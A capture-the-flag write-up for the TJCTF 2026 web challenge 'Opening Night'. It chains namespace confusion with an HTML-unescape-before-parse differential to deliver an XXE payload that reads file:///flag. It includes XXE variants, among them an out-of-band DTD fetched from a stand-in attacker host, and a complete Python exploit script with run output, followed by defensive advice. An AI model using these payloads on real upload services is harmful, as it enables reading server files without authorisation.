Web

TJCTF 2026: Opening Night

QA210 · May 2026 · SVG · Parser Differential · XXE
Challenge: Opening Night
Category: Web
CTF: TJCTF 2026
Solves: 12
Our Place: 3rd
Flag: tjctf{y0ur_4r7w0rk...}
→ Upload SVG with fake-namespace title/desc → Label parser ignores namespace
→ HTML-escape entire XML document → Gatekeeper sees text, not XML
→ Backend calls html.unescape() before XML parse → DOCTYPE + Entity become real
→ Entity expands in decoded XML → Flag in label output

Challenge Overview

The challenge presents a web gallery where users can upload SVG artwork. Each uploaded file is processed server-side: the SVG gets validated by a gatekeeper, and then metadata (title, description, dimensions) is extracted by a label writer and displayed on the gallery page. The key observation is that the output renders into three specific HTML sinks:

html
<h2>some title</h2>
<p>some description</p>
<dd>700 x 160</dd>

The challenge description says "The new gallery opens tonight." Three hints are provided that point toward a two-stage parsing pipeline with a differential vulnerability between the stages. Understanding how each stage interprets the uploaded file is the crux of this challenge. With only 12 total solves, this was one of the harder web challenges in the CTF, requiring a creative combination of two distinct bugs rather than a single straightforward vulnerability.

Hint 1

Two curators inspect each piece: one hangs the painting (carefully), the other writes the label (sloppily).

Hint 2

The gatekeeper only checks that your file looks like an SVG at the top. The label writer takes the first title/desc it sees by name, ignoring true namespace.

Hint 3

Don't look for hidden rooms, change how your art is "wrapped"! Payload must survive two interpretations: harmless text vs. XML.

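Reading these hints together, a clear picture emerges: a careful gatekeeper validates the upload, a sloppier label writer picks title/desc by local name without checking the namespace, and the winning payload has to read as harmless text to the first and as XML to the second.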

Reconnaissance

Before attempting any exploit, we need to understand the full attack surface of the gallery application. Let's walk through the normal upload flow and observe how the server processes our input.

Normal Upload Flow

Uploading a minimal, valid SVG file:

xml - normal.svg
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <title>My Artwork</title>
  <desc>A beautiful piece</desc>
  <rect width="100%" height="100%" fill="#1a1a2e"/>
  <text x="350" y="80" text-anchor="middle" fill="white" font-size="24">Hello World</text>
</svg>

The gallery page renders:

html - rendered output
<h2>My Artwork</h2>
<p>A beautiful piece</p>
<dd>700 x 160</dd>

So the server extracts <title> → <h2>, <desc> → <p>, and dimensions → <dd>. The SVG image itself is also displayed. This confirms three output sinks we can potentially control.

Validation Behavior

Let's probe what the gatekeeper accepts and rejects. We test several malformed uploads:

| Test | Result | Inference |
|---|---|---|
| Plain text file with .svg extension | Rejected | Content-type or structure is validated |
| SVG without xmlns | Rejected | Requires proper SVG namespace |
| Valid SVG with <script> inside | Rejected | Blacklists dangerous elements |
| SVG with DOCTYPE declaration | Rejected | DOCTYPE is stripped or blocked |
| SVG with extra namespace elements | Accepted | Non-SVG namespaces are allowed |
| SVG with CDATA section | Accepted | CDATA passes through |
| SVG with HTML entities in title | Accepted & decoded | html.unescape() is applied |

The critical findings: DOCTYPE declarations are rejected, but additional XML namespaces are allowed, and HTML entities are decoded. This immediately rules out straightforward XXE and points toward the namespace confusion + encoding differential approach.

The html.unescape() Discovery

One test reveals the second stage's behavior. We upload an SVG containing HTML entities in the title:

xml - entity-test.svg
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <title>Test &amp; Entity &lt;script&gt;</title>
  <desc>Testing decode</desc>
</svg>

The rendered output shows:

output
h2: 'Test & Entity <script>'

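The HTML entities have been decoded: &amp; became & and &lt;script&gt; became a literal <script>. This is consistent with the backend calling html.unescape() on the content before or during parsing, although &amp;, &lt;, and &gt; are also predefined XML entities, so an HTML-only entity such as &copy; makes a more conclusive probe. This is our attack vector.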

Key Discovery

The server runs html.unescape() on the uploaded content before XML parsing. This means if we upload HTML-escaped XML, the gatekeeper sees harmless text, but after unescaping, the XML parser receives fully functional XML, including DOCTYPE and entity declarations.
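
One caveat is worth checking locally: &amp;, &lt;, and &gt; are predefined XML entities, so a plain XML parser decodes them with no html.unescape() step at all. An entity that only HTML defines, such as &copy;, separates the two behaviors. The sketch below uses only the Python standard library; the helper name xml_text is illustrative, and the challenge server's real parser is not known.

```python
import html
import xml.etree.ElementTree as ET


def xml_text(doc: str) -> str:
    """Parse doc with a plain XML parser and return the root element's text."""
    return ET.fromstring(doc).text


# Predefined XML entities decode without any html.unescape() step.
print(xml_text("<title>Test &amp; Entity &lt;script&gt;</title>"))

# An HTML-only entity is undefined in plain XML, so the parser fails...
try:
    xml_text("<title>&copy; 2026</title>")
    html_only_ok = True
except ET.ParseError:
    html_only_ok = False
print("plain XML accepts &copy;:", html_only_ok)

# ...but the same input parses once html.unescape() has run first.
print(xml_text(html.unescape("<title>&copy; 2026</title>")))
```

If an upload containing &copy; in its title is accepted and rendered as the copyright sign, that points much more strongly at an HTML-unescape step than the &amp; test does.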

Bug 1: Namespace Confusion

Hint 2 tells us the label writer "takes the first title/desc it sees by name, ignoring true namespace." This means the metadata extraction uses a namespace-blind selector, likely an XPath such as //*[local-name()="title"] or a wildcard lookup such as find(".//{*}title"). (A bare ElementTree find("title") would not behave this way: it only matches elements that are in no namespace.)

In XML, namespaces exist precisely to disambiguate elements with the same local name. A proper SVG parser should only match {http://www.w3.org/2000/svg}title, not {urn:not-svg}title. But the label writer doesn't check namespaces, so we can inject a title element in a fake namespace that the label parser will still match.

xml - namespace-inject.svg
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <metadata>
    <x:title xmlns:x="urn:not-svg">INJECTED_TITLE</x:title>
    <x:desc xmlns:x="urn:not-svg">INJECTED_DESC</x:desc>
  </metadata>
  <title>SAFE_TITLE</title>
  <desc>SAFE_DESC</desc>
</svg>

The server renders:

output
h2: 'INJECTED_TITLE'
p : 'INJECTED_DESC'

Despite <x:title> belonging to the urn:not-svg namespace, the label parser matched it. The SVG validation also accepted it because non-SVG namespaced elements are permitted inside <metadata>. We now have full control over the label content, but this alone doesn't give us the flag. We need a way to introduce dynamic content expansion (reading a file from the server).
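
The difference between a namespace-blind and a namespace-aware lookup can be reproduced with the standard library. This is a minimal sketch, not the server's code: first_by_local_name and first_svg are hypothetical helpers that stand in for the sloppy and the careful lookup respectively.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

DOC = """<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <metadata>
    <x:title xmlns:x="urn:not-svg">INJECTED_TITLE</x:title>
  </metadata>
  <title>SAFE_TITLE</title>
</svg>"""


def first_by_local_name(root: ET.Element, name: str) -> str:
    """Namespace-blind: first element in document order whose local name matches."""
    for el in root.iter():
        # ElementTree stores qualified tags as '{namespace}local'.
        if el.tag.rsplit("}", 1)[-1] == name:
            return el.text
    raise LookupError(name)


def first_svg(root: ET.Element, name: str) -> str:
    """Namespace-aware: only elements in the SVG namespace can match."""
    el = root.find(f".//{{{SVG_NS}}}{name}")
    if el is None:
        raise LookupError(name)
    return el.text


root = ET.fromstring(DOC)
print("blind:", first_by_local_name(root, "title"))
print("aware:", first_svg(root, "title"))
```

The blind lookup returns the injected value because <x:title> comes first in document order; the qualified lookup skips it and returns the real SVG title.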

Why Not Just Inject File Content Directly?

We control the label text, but we can only put static strings there. We need XML entity expansion to dynamically include file contents at parse time. But DOCTYPE declarations are blocked by the gatekeeper... or are they?

Dead Ends

Before arriving at the correct solution, we explored the obvious alternative attack vectors. Documenting these failures is important: they show why the parser differential is the path that works.

Raw DOCTYPE Doesn't Expand

Since we control the label, the natural next step is XML entity expansion. We try uploading a document with an internal entity declaration:

xml - attempt 1: internal entity (FAILED)
<!DOCTYPE svg [
  <!ENTITY e "ENTITY_OK">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <metadata>
    <x:title xmlns:x="urn:not-svg">&e;</x:title>
  </metadata>
</svg>

The output is disappointing:

output
h2: '&e;'

The entity reference &e; is not expanded; it appears as a literal string. A result like this leads many solvers to conclude that entity expansion is impossible. But we are only hitting the gatekeeper: the DOCTYPE is stripped during validation, so the XML parser never sees the entity declaration.

External XXE and XInclude Blocked

xml - attempt 2: external entity (FAILED)
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <metadata>
    <x:title xmlns:x="urn:not-svg">&xxe;</x:title>
  </metadata>
</svg>

xml - attempt 3: OOB XXE (FAILED)
<!DOCTYPE svg [
  <!ENTITY % dtd SYSTEM "http://attacker.webhook.site/evil.dtd">
  %dtd;
]>
<svg xmlns="http://www.w3.org/2000/svg">
  ...
</svg>

xml - attempt 4: XInclude (FAILED)
<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xi="http://www.w3.org/2001/XInclude">
  <metadata>
    <x:title xmlns:x="urn:not-svg">
      <xi:include href="file:///flag" parse="text"/>
    </x:title>
  </metadata>
</svg>

Every external access vector fails.

Not SSTI or Multipart Confusion

Every straightforward attack vector fails. The solution requires understanding the two-stage processing pipeline at a deeper level.

Breakthrough: Parser Differential

Returning to Hint 3 ("Payload must survive two interpretations: harmless text vs. XML"), we now have all the pieces. The question is: how can the same bytes be harmless text to one parser but valid XML to another?

The breakthrough is HTML-encoding. If we HTML-escape the entire XML document before uploading, the gatekeeper sees only escaped text: no XML tags, no DOCTYPE, nothing suspicious. But the backend calls html.unescape() before passing the content to the XML parser, reconstructing the original XML with all its entity declarations intact.

Consider what happens when we HTML-escape an XML document:

Original XML (what we WANT the backend to see)
<!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>
<svg xmlns="http://www.w3.org/2000/svg">...</svg>

After html.escape() (what we ACTUALLY upload)
&lt;!DOCTYPE svg [&lt;!ENTITY flag SYSTEM &quot;file:///flag&quot;&gt;]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;...&lt;/svg&gt;

After HTML-escaping, every < becomes &lt;, every > becomes &gt;, every & becomes &amp;, and every " becomes &quot;. The gatekeeper inspects this and sees only escaped text: no XML structure, no DOCTYPE, nothing to validate or reject. The file passes through as harmless content.

Then the backend performs html.unescape(), which reverses every HTML entity back to its original character. The XML parser receives the clean, unescaped document, complete with DOCTYPE and entity declarations, and processes it normally.
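
The round trip is easy to confirm with the standard library. In this sketch naive_has_doctype is a hypothetical byte-level check standing in for the gatekeeper, whose real logic is not known.

```python
import html

RAW_XML = (
    '<!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>\n'
    '<svg xmlns="http://www.w3.org/2000/svg">...</svg>'
)


def naive_has_doctype(data: bytes) -> bool:
    """Hypothetical gatekeeper check: look for a literal DOCTYPE in the raw bytes."""
    return b"<!doctype" in data.lower()


# What we upload: the same document, HTML-escaped exactly once.
uploaded = html.escape(RAW_XML, quote=True).encode("utf-8")
# What the backend would parse after its unescape step.
decoded = html.unescape(uploaded.decode("utf-8"))

print("raw upload flagged:    ", naive_has_doctype(RAW_XML.encode("utf-8")))
print("escaped upload flagged:", naive_has_doctype(uploaded))
print("round trip is lossless:", decoded == RAW_XML)
```

The escaped bytes contain no < at all, so any check that searches for markup in the raw upload has nothing to match, yet a single unescape restores the document byte for byte.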

Parser Differential: Formal Definition

A parser differential vulnerability occurs when two components process the same input differently due to different parsing rules, encoding assumptions, or processing stages. In this case, the gatekeeper treats the raw bytes as text (seeing no XML structure), while the label writer first unescapes and then parses as XML (seeing a complete document with entities). This semantic gap is the vulnerability.

Why External Entities Work After Unescaping

The earlier failure happened because the gatekeeper was stripping the DOCTYPE before the XML parser ever saw it. The parser received a document without entity declarations, so &flag; was treated as an undefined entity and rendered literally.

Now, with the HTML-escape bypass, the gatekeeper never sees the DOCTYPE because it's hidden behind HTML entities. The html.unescape() step reconstructs the DOCTYPE after validation has already passed. The XML parser then receives the full document with entity declarations and expands them.

The server likely uses lxml.etree with network resolution disabled but local file resolution enabled (resolve_entities=True together with no_network=True), a common misconfiguration that allows file:// URIs in SYSTEM entities while blocking http://.

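python - likely server code
# Speculative reconstruction: has_doctype, is_valid_svg, and reject are
# hypothetical helpers, and request is the web framework's request object.
import html
from lxml import etree

# Stage 1: Gatekeeper validates the raw upload
raw = request.files['svg_file'].read()
if has_doctype(raw):          # Checks for <!DOCTYPE in raw bytes
    reject("DOCTYPE not allowed")
if not is_valid_svg(raw):     # Checks for <svg> tag structure
    reject("Invalid SVG")

# Stage 2: Label Writer unescapes, then parses
decoded = html.unescape(raw.decode())    # &lt; → <, &amp; → &, etc.
parser = etree.XMLParser(resolve_entities=True, no_network=True)
tree = etree.fromstring(decoded.encode(), parser)    # Now sees DOCTYPE + entities!
# Namespace-blind search: first match in document order, whatever its namespace
title = tree.xpath('//*[local-name()="title"]')[0]
desc = tree.xpath('//*[local-name()="desc"]')[0]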

Final Exploit

Payload Construction

Because the HTML-unescape step happens before XML parsing, we can now place a DOCTYPE declaration at the very start of the document, ahead of the root element, which is the only position where XML allows it. After unescaping, the XML parser sees a proper DTD with entity definitions and expands them accordingly.

The complete payload before HTML-escaping:

xml - desired backend XML
<!DOCTYPE svg [
  <!ENTITY flag SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <metadata>
    <x:title xmlns:x="urn:not-svg">&flag;</x:title>
    <x:desc xmlns:x="urn:not-svg">Opening Night Gallery</x:desc>
  </metadata>
  <title>Safe Title</title>
  <desc>Safe Description</desc>
  <rect width="100%" height="100%" fill="white"/>
</svg>

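Breaking down every component: the DOCTYPE declares an external entity named flag that points at file:///flag; the fake-namespace <x:title> carries the &flag; reference where the namespace-blind label writer will find it first; and the remaining <title>, <desc>, and <rect> are ordinary SVG content.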

Applying HTML-Escape

Now we HTML-escape the entire document. Every <, >, &, and " gets converted to its HTML entity equivalent:

text - what we actually upload
&lt;!DOCTYPE svg [
  &lt;!ENTITY flag SYSTEM &quot;file:///flag&quot;&gt;
]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; width=&quot;700&quot; height=&quot;160&quot;&gt;
  &lt;metadata&gt;
    &lt;x:title xmlns:x=&quot;urn:not-svg&quot;&gt;&amp;flag;&lt;/x:title&gt;
    &lt;x:desc xmlns:x=&quot;urn:not-svg&quot;&gt;Opening Night Gallery&lt;/x:desc&gt;
  &lt;/metadata&gt;
  &lt;title&gt;Safe Title&lt;/title&gt;
  &lt;desc&gt;Safe Description&lt;/desc&gt;
  &lt;rect width=&quot;100%&quot; height=&quot;100%&quot; fill=&quot;white&quot;/&gt;
&lt;/svg&gt;

Pay special attention to &amp;flag;, which is the HTML-escaped form of &flag;. After html.unescape(), &amp; becomes &, so the XML parser sees &flag;, which it then expands as an entity reference.

Complete Exploit Flow

  1. HTML-escape the entire XML document: every <, >, &, and quote character gets converted to its HTML entity equivalent.
  2. Upload the escaped content as image/svg+xml.
  3. Gatekeeper inspects the raw bytes and sees only &lt;, &gt;, &amp; sequences. No <!DOCTYPE pattern. No <svg> tag. Passes validation as harmless text.
  4. Backend calls html.unescape(): all HTML entities are decoded back to their original characters. The full XML document is reconstructed.
  5. XML parser receives the clean document with <!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]> and processes the entity declaration.
  6. Entity expansion: &flag; resolves to the contents of /flag on the server's filesystem.
  7. Label parser extracts the expanded entity value via its namespace-blind title match and renders it in the <h2> tag.
  8. Flag appears in the gallery page output.
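
The steps above can be rehearsed locally before touching the challenge server. The sketch below is a toy pipeline under stated assumptions: gatekeeper and label_writer are hypothetical stand-ins for the two server stages, and an internal entity with a fake value replaces the file:///flag read, because the standard library's ElementTree does not resolve external entities.

```python
import html
import xml.etree.ElementTree as ET

# Internal entity with a placeholder value, standing in for SYSTEM "file:///flag".
RAW_XML = (
    '<!DOCTYPE svg [<!ENTITY flag "FAKE_FLAG_FOR_LOCAL_TEST">]>'
    '<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">'
    '<metadata><x:title xmlns:x="urn:not-svg">&flag;</x:title></metadata>'
    '<title>Safe Title</title>'
    '</svg>'
)


def gatekeeper(raw: bytes) -> bool:
    """Hypothetical stage 1: accept only uploads with no literal DOCTYPE."""
    return b"<!doctype" not in raw.lower()


def label_writer(raw: bytes) -> str:
    """Hypothetical stage 2: unescape, parse, take the first title by local name."""
    root = ET.fromstring(html.unescape(raw.decode("utf-8")))
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "title":
            return el.text
    raise LookupError("no title element")


def pipeline(raw: bytes) -> str:
    """Run both stages the way the writeup assumes the server does."""
    if not gatekeeper(raw):
        return "REJECTED"
    return label_writer(raw)


print(pipeline(RAW_XML.encode("utf-8")))               # literal DOCTYPE is caught
print(pipeline(html.escape(RAW_XML).encode("utf-8")))  # escaped upload slips through
```

Both bugs are needed for the second call to succeed: the unescape step smuggles the DOCTYPE past stage 1, and the local-name match makes stage 2 read the fake-namespace title that holds the expanded entity.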

Flag

tjctf{y0ur_4r7w0rk_is_n0w_0n_displ4y}

Exploit Code

python - solve.py
#!/usr/bin/env python3
"""
TJCTF 2026: Opening Night
Parser Differential via HTML-escape → unescape → XML entity expansion
Author: QA210  |  3rd solve / 12 total
"""
import html
import re
import sys
import requests

TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"
FLAG_PAT = re.compile(r"tjctf\{[^}]+\}", re.IGNORECASE)


def craft_svg_payload():
    """
    Build the raw XML with DOCTYPE + external entity, then HTML-escape it.

    The raw XML contains:
    - DOCTYPE with SYSTEM entity pointing to /flag
    - Fake-namespace title/desc that the label parser matches
    - Entity reference &flag; in the fake-namespace title

    After html.escape(), the gatekeeper sees only escaped text.
    After html.unescape() on the backend, the XML parser sees the full
    document and expands &flag; to the file contents.
    """
    raw_xml = (
        '<!DOCTYPE svg [\n'
        '  <!ENTITY flag SYSTEM "file:///flag">\n'
        ']>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">\n'
        '  <metadata>\n'
        '    <x:title xmlns:x="urn:not-svg">&flag;</x:title>\n'
        '    <x:desc xmlns:x="urn:not-svg">QA210 Gallery</x:desc>\n'
        '  </metadata>\n'
        '  <title>Safe</title>\n'
        '  <desc>Safe</desc>\n'
        '  <rect width="100%" height="100%" fill="white"/>\n'
        '</svg>\n'
    )
    # The critical step: HTML-escape the entire document once.
    # Gatekeeper sees escaped text; backend unescapes before XML parse.
    return html.escape(raw_xml, quote=True).encode("utf-8")


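def find_upload_endpoint(session):
    """Discover the upload form action and file field name."""
    r = session.get(f"{TARGET}/", timeout=30)
    action_m = re.search(r'<form[^>]*\baction="([^"]*)"', r.text)
    # Locate the file input first, then its name, so attribute order does not matter.
    input_m = re.search(r'<input[^>]*\btype="file"[^>]*>', r.text)
    field_m = re.search(r'\bname="([^"]*)"', input_m.group(0)) if input_m else None
    if not action_m or not field_m:
        return f"{TARGET}/upload", "file"  # fallback guess
    # urljoin handles both relative and absolute form actions.
    return requests.compat.urljoin(r.url, action_m.group(1)), field_m.group(1)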


def main():
    session = requests.Session()
    action_url, field_name = find_upload_endpoint(session)
    payload = craft_svg_payload()

    print(f"[*] Target:  {TARGET}")
    print(f"[*] Action:  {action_url}")
    print(f"[*] Field:   {field_name}")
    print(f"[*] Payload: {len(payload)} bytes (HTML-escaped XML)")

    resp = session.post(
        action_url,
        files={field_name: ("opening.svg", payload, "image/svg+xml")},
        allow_redirects=True,
        timeout=30,
    )

    match = FLAG_PAT.search(resp.text)
    if match:
        print(f"[+] FLAG: {match.group(0)}")
    else:
        print("[-] Flag not found in response.")
        for line in resp.text.splitlines():
            if "title" in line.lower() or "flag" in line.lower():
                print(f"    {line.strip()}")


if __name__ == "__main__":
    main()

Running the Exploit

bash
$ python3 solve.py https://opening-night.tjctf.org
[*] Target:  https://opening-night.tjctf.org
[*] Action:  https://opening-night.tjctf.org/upload
[*] Field:   svg_file
[*] Payload: 587 bytes (HTML-escaped XML)
[+] FLAG: tjctf{y0ur_4r7w0rk_is_n0w_0n_displ4y}

Key Takeaways

This challenge demonstrates a classic parser differential attack. When two components process the same data using different rules, the gap between their interpretations becomes an attack surface. Security decisions made by one parser can be completely undermined by transformations applied before the second parser.

HTML entity encoding is a representation, not a security boundary. Applying html.unescape() before parsing effectively nullifies any validation that was performed on the escaped form. The lesson: always validate the decoded form of input, not the encoded form.

Using namespace-blind XML selectors like //*[local-name()="title"] instead of a qualified lookup such as find("{http://www.w3.org/2000/svg}title") allows attackers to inject elements in fake namespaces that the parser still matches. Always use fully-qualified names when processing XML from untrusted sources.

Defensive Recommendations

1. Validate after decoding: Never validate encoded input and then decode before use. Decode first, then validate the decoded form.
2. Use namespace-aware parsers: Always match elements by their fully-qualified name including namespace URI.
3. Disable entity resolution: Configure XML parsers with resolve_entities=False and no_network=True. For defense-in-depth, also strip DOCTYPE declarations server-side.
4. Use allowlists, not denylists: Instead of blocking specific dangerous patterns (DOCTYPE, script tags), only allow known-safe structures.
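
The first three recommendations can be combined in a few lines. This is a minimal sketch using only the standard library, not a drop-in fix for the challenge server: extract_label and RejectedUpload are hypothetical names, and the unescape step is kept only because the writeup assumes the backend needs it.

```python
import html
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


class RejectedUpload(ValueError):
    """Raised when an upload fails validation."""


def extract_label(raw: bytes) -> dict:
    # Decode first, so validation and parsing look at the same text.
    decoded = html.unescape(raw.decode("utf-8"))
    # Validate the decoded form: no DTD means no entity declarations.
    if DOCTYPE_RE.search(decoded):
        raise RejectedUpload("DOCTYPE not allowed")
    try:
        root = ET.fromstring(decoded)
    except ET.ParseError as exc:
        raise RejectedUpload("not well-formed XML") from exc
    if root.tag != f"{{{SVG_NS}}}svg":
        raise RejectedUpload("root element is not an SVG <svg>")
    # Fully qualified lookups ignore look-alike elements in other namespaces.
    return {
        "title": root.findtext(f".//{{{SVG_NS}}}title", default=""),
        "desc": root.findtext(f".//{{{SVG_NS}}}desc", default=""),
    }


benign = (
    b'<svg xmlns="http://www.w3.org/2000/svg">'
    b'<metadata><x:title xmlns:x="urn:not-svg">INJECTED</x:title></metadata>'
    b'<title>SAFE</title><desc>D</desc></svg>'
)
print(extract_label(benign))
```

With this ordering the HTML-escaped exploit payload is rejected, because the DOCTYPE check runs on exactly the text the parser will see, and the fake-namespace title is ignored.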